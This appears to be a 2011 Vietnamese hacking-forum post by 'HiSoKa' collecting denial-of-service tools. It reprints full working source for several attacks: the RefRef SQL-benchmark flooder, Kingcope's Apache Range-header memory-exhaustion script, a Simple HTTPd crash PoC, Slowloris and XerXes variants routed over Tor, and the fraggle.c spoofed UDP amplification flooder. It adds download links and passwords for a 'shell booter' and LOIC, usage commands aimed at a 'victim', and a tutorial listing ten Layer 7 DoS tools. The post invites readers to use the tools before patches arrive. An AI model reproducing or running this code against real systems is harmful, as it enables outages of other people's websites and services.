Shell Booter full share by HiSoKa

Shell Booter support GET shell ,POST shell.Time attack limit 120s.Share by HiSoKa huydiet.vn



http://www.mediafire.com/?rdk8baxaetvokw5

pass unrar : hisoka

Code GET ,POST shell search with Google.

Video hướng dẫn sử dụng RefRef dos anonymous source code perl

Video do HiSoKa thực hiện :

vIDEO DOWNLOAD HERE http://www.mediafire.com/?vm75f62m8dwxwr2


cài đặt perl
tiếp theo perl -MCPAN -e "install LWP::UserAgent"
sử dụng perl file.pl victim

#!usr/bin/perl
#RefRef (C) Anonymous 2011

use LWP::UserAgent;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();
if($ARGV[0]) {
now($ARGV[0]);
} else {
sintax();
}
copyright();

sub now {
print "\n[+] Target : ".$_[0]."\n";
print "\n[+] Starting the attack\n[+] Info : control+c for stop attack\n\n";
while(true) {
$SIG{INT} = \&adios;
$code = toma($_[0]." and (select+benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f))");
unless($code->is_success) {
print "[+] Web Off\n";
copyright();
}}}

sub adios {
print "\n[+] Stoping attack\n";
copyright();
}

sub head {
print "\n\n-- == #RefRef == --\n\n";
}

sub copyright {
print "\n\n-- == RefRef == --\n\n";
exit(1);
}

sub sintax {
print "\n[+] Sintax : $0 \n";
}

sub toma {
return $nave->get($_[0]);
}

# ¿ The End ?

ddos

Apache httpd Remote Denial of Service (memory exhaustion)

Test rất tốt xài perl nhé nhớ install 2 modul của nó

#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#

use IO::Socket;
use Parallel::ForkManager;

sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}

sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";

$pm = new Parallel::ForkManager($numforks);

$|=1;
srand(time());
$p = "";
for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } for ($k=0;$k<$numforks;$k++) { my $pid = $pm->start and next;

$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

while(<$sock>) {
}
$pm->finish;
}
$pm->wait_all_children;
print ":pPpPpppPpPPppPpppPp\n";
}

sub testapache {
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "80",
Proto => 'tcp');

$p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
print $sock $p;

$x = <$sock>;
if ($x =~ /Partial/) {
print "host seems vuln\n";
return 1;
} else {
return 0;
}
}

if ($#ARGV < 0) { usage; exit; } if ($#ARGV > 1) {
$numforks = $ARGV[1];
} else {$numforks = 50;}

$v = testapache();
if ($v == 0) {
print "Host does not seem vulnerable\n";
exit;
}
while(1) {
killapache();
}

ddos

Simple HTTPd 1.42 Denial of Servive Exploit

#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link:
http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit
still works.
# Simple HTTPd is still affected by the bug. The executable must be
compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.

import socket, sys


buf = "A" * 6000

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))

s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close()

Low Orbit Ion Cannon + download

download

http://www.mediafire.com/?ciplk3icr03n3w1

pass : ten minh nhe

Slowloris with a twist over tor

Slowloris with a twist over tor





http://seclists.org/fulldisclosure/2011/Jul/84


source code :


/* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
* Slowloris with a twist over tor
* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*
* Due to the alpha version of this code being leaked I've decided
* to release an improved version to fully show this method of
* attack mostly free of the bugs / dependency on torsocks. This
* attack works on a similar idea of slowloris only it sends packets
* containing a single 0x00 and optionally nothing causing Apache
* to keep the connection alive almost indefinitely.
*
* Due to no one knowing how th3j35t3r's XerXes works I can not say
* if this is the same method. This was one of my many ideas I was
* exploring as to how it could possibly work that has some successful
* results.
*
* - SanguineRose / William Welna
*
* Leaked Version
* http://seclists.org/fulldisclosure/2011/Jul/84
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Re-connecting to tor sometimes takes a while, in order for this to be effective it requires
* mass amounts of threads handling only a few connections each, since this is a POC I will leave
* it up to others to fix that. It also has limited success/attack lengths due to tor being slow
*/
#define CONNECTIONS 3
#define THREADS 148

typedef struct {
const char *host, *port;
} thread_args;

// Simple debug function
void dump_array(char *name, char *data, int size) {
int x, z, indent = strlen(name) + 2;
fprintf(stderr, "%s { ", name);
for(x=0; x < size; x++) { for(z=0; z < indent; z++) putc(0x20, stderr); fprintf(stderr, "%20x\n", data[x]); } fprintf(stderr, "};\n"); } int make_socket(const char *host, const char *port) { struct addrinfo hints, *servinfo, *p; int sock, r, y=1; memset(&hints, 0, sizeof(hints)); hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); return -1; } for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &y, 4);
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
return -2;
}
if(servinfo)
freeaddrinfo(servinfo);
return sock;
}

/* Opens SOCKS5 connection to tor
* I also dedicate this function to pr0f <3 */ int pr0f_loves_me_tor_connect(const char *host, const char *port) { char *buf = calloc(1024, sizeof(char)); short l = strlen(host), t; int x, sock; fprintf(stderr, "[Connect %s:%s]\n", host, port); if((sock=make_socket("127.0.0.1", "9050"))<0) { free(buf); return sock; } write(sock, "\x05\x01\x00", 3); // SOCKS5, 1 Authentication Method, No Auth/Plain read(sock, buf, 1024); if((buf[0] != 0x05) || (buf[1] == 0xFF) || (buf[1] != 0x00)) { free(buf); return -3; // Auth not accepted by socks server / wrong version } buf[0] = 0x05; buf[1] = 0x01; buf[2] = 0x00; buf[3] = 0x03; buf[4] = l; for(x=0; x < l; x++) buf[5+x] = host[x]; x=l+5; t = htons(atoi(port)); memcpy((buf+x), &t, 2); //dump_array("final_request", buf, x+2); write(sock, buf, x+2);// send request read(sock, buf, 1024); if((buf[0] == 0x05) && (buf[1] == 0x00)) { // connection granted/success free(buf); return sock; } free(buf); return -4; // Unable to conect } // This is for the SIGPIPE error on bad connections / premature closing void broke(int s) { // do nothing } void *attack(void *arg) { thread_args *a = (thread_args *)arg; int x, r, socks[CONNECTIONS]; fprintf(stderr, "[Thread Started]\n"); for(x=0; x < CONNECTIONS; x++) socks[x]=0; signal(SIGPIPE, &broke); while(1) { for(x=0; x < CONNECTIONS; x++) { if(socks[x] <= 0) { socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
fprintf(stderr, "[Socket Returned %i]\n", socks[x]);
}
if(write(socks[x], "\0", 1) < 0) { close(socks[x]); fprintf(stderr, "[Socket Error Returned %i]\n", socks[x]); socks[x] = pr0f_loves_me_tor_connect(a->host, a->port);
}
}
usleep(100000);
}
}

void do_help(char *n) {
fprintf(stderr, "Usage: %s \n");
exit(0);
}

void *cycle_identity() {
int sock = make_socket("localhost", "9051");
char *shit_bucket = calloc(1024, sizeof(char));
if(sock < 0) { fprintf(stderr, "Can't connect to tor control port\n"); free(shit_bucket); pthread_exit(NULL); } write(sock, "AUTHENTICATE \"\"\n", 16); while(1) { write(sock, "signal NEWNYM\n", 15); fprintf(stderr, "[cycle_identity -> signal NEWNYM\n");
read(sock, shit_bucket, 1024);
sleep(5);
}
}

int main(int argc, char **argv) {
pthread_t threads[THREADS];
pthread_t cycle_tid;
thread_args arg;
void *status;
int x;
if(argc != 3)
do_help(argv[0]);
arg.host = (const char *)argv[1];
arg.port = (const char *)argv[2];
pthread_create(&cycle_tid, NULL, cycle_identity, NULL);
for(x=0; x < THREADS; x++) {
pthread_create(&threads[x], NULL, attack, &arg);
usleep(200000);
}
for(x=0; x < THREADS; x++)
pthread_join(threads[x], &status);
pthread_kill(cycle_tid, 15);
pthread_exit(NULL);
return 0;
}

Fraggle attack v4

[QUOTE]#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct pktinfo
{
int ps;
int src;
int dst;
};

void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinfo *);
void sigint (int);
unsigned short checksum (u_short *, int);

int main (int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
struct pktinfo p;
int s, num, delay, n, cycle;
char **bcast = malloc(1024), buf[32];
FILE *bfile;

/* banner */
fprintf(stderr, "\nfraggle.c by TFreak\n\n");

/* capture ctrl-c */
signal(SIGINT, sigint);

/* check for enough cmdline args */
if (argc < 5) { fprintf(stderr, "usage: %s "
" [dstport] [srcport] [psize] \n\n"
"target\t\t= address to hit\n"
"bcast file\t= file containing broadcast addrs\n"
"num packets\t= send n packets (n = 0 is constant)\n"
"packet delay\t= usleep() between packets (in ms)\n"
"dstport\t\t= port to hit (default 7)\n"
"srcport\t\t= source port (0 for random)\n"
"ps\t\t= packet size\n\n",
argv[0]);
exit(-1);
}

/* get port info */
if (argc >= 6)
p.dst = atoi(argv[5]);
else
p.dst = 7;
if (argc >= 7)
p.src = atoi(argv[6]);
else
p.src = 0;

/* packet size redundant if not using echo port */
if (argc >= 8)
p.ps = atoi(argv[7]);
else
p.ps = 1;

/* other variables */
num = atoi(argv[3]);
delay = atoi(argv[4]);

/* resolve host */
if (isdigit(*argv[1]))
sin.sin_addr.s_addr = inet_addr(argv[1]);
else
{
if ((he = gethostbyname(argv[1])) == NULL)
{
fprintf(stderr, "Can't resolve hostname!\n\n");
exit(-1);
}

memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(0);

/* open bcast file and build array */
if ((bfile = fopen(argv[2], "r")) == NULL)
{
perror("opening broadcast file");
exit(-1);
}
n = 0;
while (fgets(buf, sizeof buf, bfile) != NULL)
{
buf[strlen(buf) - 1] = 0;
if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0]))
continue;
bcast[n] = malloc(strlen(buf) + 1);
strcpy(bcast[n], buf);
n++;
}
bcast[n] = '\0';
fclose(bfile);

/* check for addresses */
if (!n)
{
fprintf(stderr, "Error: No valid addresses in file!\n\n");
exit(-1);
}

/* create our raw socket */
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0) { perror("creating raw socket"); exit(-1); } printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]); for (n = 0, cycle = 0; n < num || !num; n++) { if (!(n % 25)) { printf("."); fflush(stdout); } srand(time(NULL) * rand() * getpid()); fraggle(s, &sin, inet_addr(bcast[cycle]), &p); if (bcast[++cycle] == NULL) cycle = 0; usleep(delay); } sigint(0); } void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct pktinfo *p) { struct iphdr *ip; struct udphdr *udp; char *packet; int r; packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
ip = (struct iphdr *)packet;
udp = (struct udphdr *) (packet + sizeof(struct iphdr));

memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);

/* ip header */
ip->protocol = IPPROTO_UDP;
ip->saddr = sin->sin_addr.s_addr;
ip->daddr = dest;
ip->version = 4;
ip->ttl = 255;
ip->tos = 0;
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
ip->ihl = 5;
ip->frag_off = 0;
ip->check = checksum((u_short *)ip, sizeof(struct iphdr));

/* udp header */
udp->len = htons(sizeof(struct udphdr) + p->ps);
udp->dest = htons(p->dst);
if (!p->src)
udp->source = htons(rand());
else
udp->source = htons(p->src);

/* send it on its way */
r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps,
0, (struct sockaddr *) sin, sizeof(struct sockaddr_in));
if (r == -1)
{
perror("\nSending packet");
exit(-1);
}

free(packet); /* free willy 2! */
}

unsigned short checksum (u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

while (nleft > 1)
{
sum += *w++;
nleft--;
}

if (nleft == 1)
{
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}

sum = (sum >> 17) + (sum & 0xffff);
sum += (sum >> 17);
answer = -sum;
return (answer);
}

void sigint (int ignoremewhore)
{
fprintf(stderr, "\nDone!\n\n");
exit(0);
}


[/QUOTE]

XerXes Dos attack source code(wikileaks)

Đây là tools dos khá mới nhưng đã được nhóm tin tặc LulzSec khẳng định là slowloris với những cải tiến từ các packet.Nó vẫn làm apache giữ kết nối.Cá nhân tôi sử dụng thì thấy quả thật vậy.Trước khi có bản vá lỗi các bạn hãy khám phá sức mạnh tuyệt vời của nó.

[PHP]#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}

void broke(int s) {
// do nothing
}

#define CONNECTIONS 8
#define THREADS 48

void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: Voly Sent]\n", id);
}
fprintf(stderr, "[%i: Voly Sent]\n", id);
usleep(300000);
}
}

void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}

int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);javascript:void(0)
return 0;
}[/PHP]

Layer 7 Dos attack tutorial 2011 by HiSoKa

Tổng hợp tất cả những tools "xài được" và được xài nhiều trong năm nay.Share với mục đích học tập.Mình sẽ không chịu trách nhiệm khi các bạn sử dụng và việc xấu.
Việc các bạn lech đi đâu vui lòng giữ tên người viết bài này
Các công cụ bao gồm sử dụng 1 hay more.. máy tính và sử dụng proxy,irc server.v.v.v để thực hiện Ddos.


Layer 7 DoS: One attacker brings down one site tools.


1.Slowloris



Slowloris có lẽ là công cụ rất lợi hại
http://ha.ckers.org/slowloris/
cài đặt perl
và modul
perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'

sử dụng perl slowloris.pl -dns victim.com



2.HTTP POST 3.6


Tools này mình đã share đầu năm 2010 tại xgroup.vn
Chức năng thì tuyệt vời rồi.
1 Slowheader
2.Slowhttp post
Nó có thể quật ngã bất kỳ server nào chưa cài iptables và mod timeout



3.DDosim


Công cụ này làm tôi nhớ lại thời xài suppernova DC++ hublist với khá nhiều chức năng hay như tạo kết nối TCP ,invalid HTTP, HTTP valid.v.v
down mã nguồn về cài đặt
cd ..path
./configure
make
make install
sử dụng : ./ddosim



4.keep-alive attack


Sử dụng phương pháp giữ các kết nối đến SERVER mình thích cái chức năng của nó
source php
http://www.esrun.co.uk/blog/keep-alive-dos-script/
sử dụng





5.Low Orbit Ion Cannon Anonymous


Công cụ này quá khoái luôn xài lần là thích


ngoài ra còn bản 2.4 xài cho phone





6.r-u-dead


chỉnh sưa file conf url victim .v.v.v
tấn công python file.py




7. SLOW POST NEWVER BY HISOKA



tự động đổi user gent với list user gent dài dằng dặc ^^ và slow with method post vicim




8.Smurf 6.0


Chắc hẳn các bạn đã quen với murf2k vậy ver mới sẽ có gì khác biệt k? ^^
dùng ip scan hộ trợ bạn trong việc tìm list ip để tấn công
đây là mã nguồn C bạn biên dịch và sử dụng linux




9.DRDOS



Đây là phương pháp tấn công phản xạ khá là lí thú
mã nguồn DNSDRDOS.C


Với tools perl DRDOS v2 code 2011 :



10.Tools Slow dos PURIDDE Goobye ver3.0





Cài đặt sử dụng : trên xpsp2 với dotnet 2.0


Sunday, August 07, 2011 Tutorial by hisoka

Layer 7 DDos attack